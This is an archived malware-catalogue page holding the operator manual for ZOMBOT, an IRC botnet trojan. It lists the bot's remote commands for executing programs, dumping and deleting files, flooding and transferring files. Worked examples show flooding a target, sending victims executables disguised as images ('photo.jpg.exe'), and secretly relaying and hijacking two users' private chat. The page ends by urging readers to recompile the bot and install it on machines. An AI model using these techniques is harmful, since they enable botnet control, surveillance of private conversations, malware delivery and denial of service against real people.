Copyright © MegaSecurity

By Zombie

Author Zombie
Category Remote Access
Version ZOMBOT

Author Information / Description
Z-O-M-B-O-T      version 1.xx        (x) 2000 
                        play with your own IRC army

  Main idea is that ZOMBOT.EXE will be installed on hundreds machines,
  and each zombot will connect to IRC, increasing your power.

  - join IRC
  - receive commands from you; forward 'em to IRC server

[*] To force zombot do single action N times (i.e. send it back to IRC):

      /PRIVMSG abc :<psw1> <[xN] action>

[*] Also, single action may be sent to a channel with some zombots:

      /PRIVMSG #ch :<psw1> <[xN] action>

[*] To force broadcast action, i.e. to distribute single action between
    all zombots on the IRC: (N=probability of each single action, if defined)

      /PRIVMSG abc :<psw1> $bcast <[pN] [xN] action>

    broadcast action should not be sent to a chan;
    it also may not contain psw1 substring.

[*] <action> can be any IRC command, or one of the following commands:

      $bcast <action>            -- do broadcast action
      $quit                      -- quit IRC, quit zombot.exe (until reboot)
      $sleep <N>                 -- quit IRC, sleep N seconds, then return.
      $rename [nick1 [nick2...]] -- change nickname. (no nick == random)
                                    try all given nicknames, then set random
      $forward [nick|<#chan|*]   -- forward IRC output to nick/chan, *=clear
      $flood <nick>              -- do flood (from current bot)
      $info [nick|#chan]         -- return zombot/machine info
      $exec <cmdline>            -- execute cmdline; %windir% & etc. allowed
      $dump [[fname] nick|#chan] -- dump file. no fname == $exec's result
      $cd [path]                 -- get/set current directory
      $dir [path: [/s]]          -- dir, /s=recursive
      $delete <filename>         -- delete file
      $stop                      -- use it to break $dump/$dir    [NO PSW]
      $kix0r <#chan> <nick>      -- same as if <nick> kicked/deopped brother
      $brolist                   -- dump current brother list
      $ini list                  -- view IRC_commands_to_exec_at_startup
      $ini del                   -- delete ini file
      $ini add <text>            -- append one line to ini file
      $dcc send <nick> <fname>   -- dcc send file to nick
      $dcc recv                  -- accept dcc send, i.e. receive file
      $redir list                -- list redirect info
      $redir del                 -- del all redirect info
      $redir del <n>             -- del redirect entry #n
      $redir add <src> <dst> [hide] --redirect src nick/chan to dst nick/chan
                                      'hide' means to disable source info
      $servlist list             -- list IRC server list
      $servlist del              -- delete IRC server list
      $servlist del <n>          -- delete IRC server list #n
      $servlist add hostname minport maxport   -- add IRC server

      Any $-prefixed commands added into .INI file will be executed at
      startup. Thus, adding static IRC server into list looks as following:

      PRIVMSG abc :<psw1> $ini add $servlist add us.undernet.org 6665 6668

[*] Examples

      #virus            -- target channel
      abc, cde          -- zombots on #virus
      xyz, qqq, ...     -- other zombots (not on chan)
      retch             -- motherfucker
      fux0r1            -- default psw1

    PRIVMSG abc :fux0r1 JOIN #virus     -- abc has joined #virus
    PRIVMSG cde :fux0r1 $bcast JOIN #virus  -- abc,xyz,qqq,... has joined #virus

    PRIVMSG cde :fux0r1 $ini del        -- make this bot joining only #virus
    PRIVMSG cde :fux0r1 $ini add JOIN #virus           each time its started

    PRIVMSG xyz :fux0r1 $flood retch       -- flood with finger/etc. requests
    PRIVMSG xyz :fux0r1 x100 PRIVMSG retch :are you alive?  -- kind of flood
    PRIVMSG abc :fux0r1 $bcast $flood retch  -- force abc,cde,xyz,... to flood

    dcc send qqq pussy.jpg.exe          -- send virus to qqq, qqq is my bot
    PRIVMSG qqq :fux0r1 $dcc recv       -- force qqq to receive file
    PRIVMSG qqq :fux0r1 $rename pussy
    PRIVMSG pussy :fux0r1 JOIN #virus
    PRIVMSG pussy :fux0r1 $redir mynick lamer hide -- redirect my msgs to lamer
    PRIVMSG pussy :fux0r1 $redir lamer mynick      -- and vise versa
    PRIVMSG pussy :hava new kewl pic for u!
    PRIVMSG pussy :$dcc send lamer pussy.jpg.exe


    let we know that there're nick names jack and john.
    let we have two zombots on IRC, bot1 and bot2.

    now, see what i'm doing:

    normal chat:  jack <--irc--> john

    now becomes:  jack <--irc--> _john <--irc--> _jack <--irc--> john
                                 ==bot1          ==bot2

    [1] install bot1 (_john) between jack and _jack

        PRIVMSG bot1 :fux0r1 $redir add jack _jack hide
        PRIVMSG bot1 :fux0r1 $redir add _jack jack hide
        PRIVMSG bot1 :fux0r1 $rename _john

    [2] install bot2 (_jack) between john and _john

        PRIVMSG bot2 :fux0r1 $redir add john _john hide
        PRIVMSG bot2 :fux0r1 $redir add _john john hide
        PRIVMSG bot2 :fux0r1 $rename _jack

    [3] and now, install hukker (let it be your nick)
        as a mathafukka watching private chat between _jack and _john,
        i.e. between real jack and john

        PRIVMSG _john :fux0r1 $redir add  jack hukker
        PRIVMSG _john :fux0r1 $redir add _jack hukker

        PRIVMSG _jack :fux0r1 $redir add  john hukker
        PRIVMSG _jack :fux0r1 $redir add _john hukker

    [4] well, private chat may be started right now ;-)

        PRIVMSG _jack :fux0r1 PRIVMSG john :hi, john!

    [5] lets see, what happened as a result of our manipulations:

        _jack -->  john : hi, john!

         john --> _jack : hi, how's life?
        _jack --> _john : hi, how's life?   _jack --> hukker : john>> hi, how's life?
        _john -->  jack : hi, how's life?

         jack --> _john : good, and yours?
        _john --> _jack : good, and yours?  _john --> hukker : jack>> good, and yours?
        _jack -->  john : good, and yours?


    [6] Well, now hukker is tired of watching private chat.
        So, he breaks their happy connection, inserting himself between
        _jack(jack) and _john(john).

        PRIVMSG _jack :fux0r1 $redir del
        PRIVMSG _jack :fux0r1 $redir add john hukker
        PRIVMSG _jack :fux0r1 $redir add hukker john hide

        PRIVMSG _john :fux0r1 $redir del
        PRIVMSG _john :fux0r1 $redir add jack hukker
        PRIVMSG _john :fux0r1 $redir add hukker jack hide

        hukker --> _jack : have to go. btw, this is my foto
        _jack  -->  john : have to go. btw, this is my foto
        PRIVMSG _jack :fux0r1 $dcc send john photo.jpg.exe

        hukker --> _john : time to go, jacky... i'll email you my foto. bye
        _john  -->  jack : time to go, jacky... i'll email you my foto. bye

        turn _jack/_john out from IRC for 10 mins:
        PRIVMSG _jack :fux0r1 $sleep 600
        PRIVMSG _john :fux0r1 $sleep 600

    By the way, the same thing may be performed using two emails.
    Just find two serious guys, and install email connection between'em. ;-)

[*] Authentication

    Use HOST2REAL.EXE <yourhostname> to get your IRC realname.
    Such realname will be accepted by all zombots as "one of us",
    and you will be "protected" person on channel with zombots.

[*] other features

    All zombots will protect each other.
    This means, that when somebody kicks/bans/deops some zombot on a chan,
    all other zombots will kick/ban sucker, and, moreover, kicked bot
    will rejoin and send broadcasting message to all others to flood badguy.

[*] Using ZOMBOTs

    If you're reading this text, then i've played with bots enough. ;-)
    So, change irc_psw, recompile bot and install/run it on some machines.

    As you can see, zombots was initially designed as a distributed
    flooding mechanism, to be used in the channel takeover actions. So,

                             Seek & Enjoy! X-)

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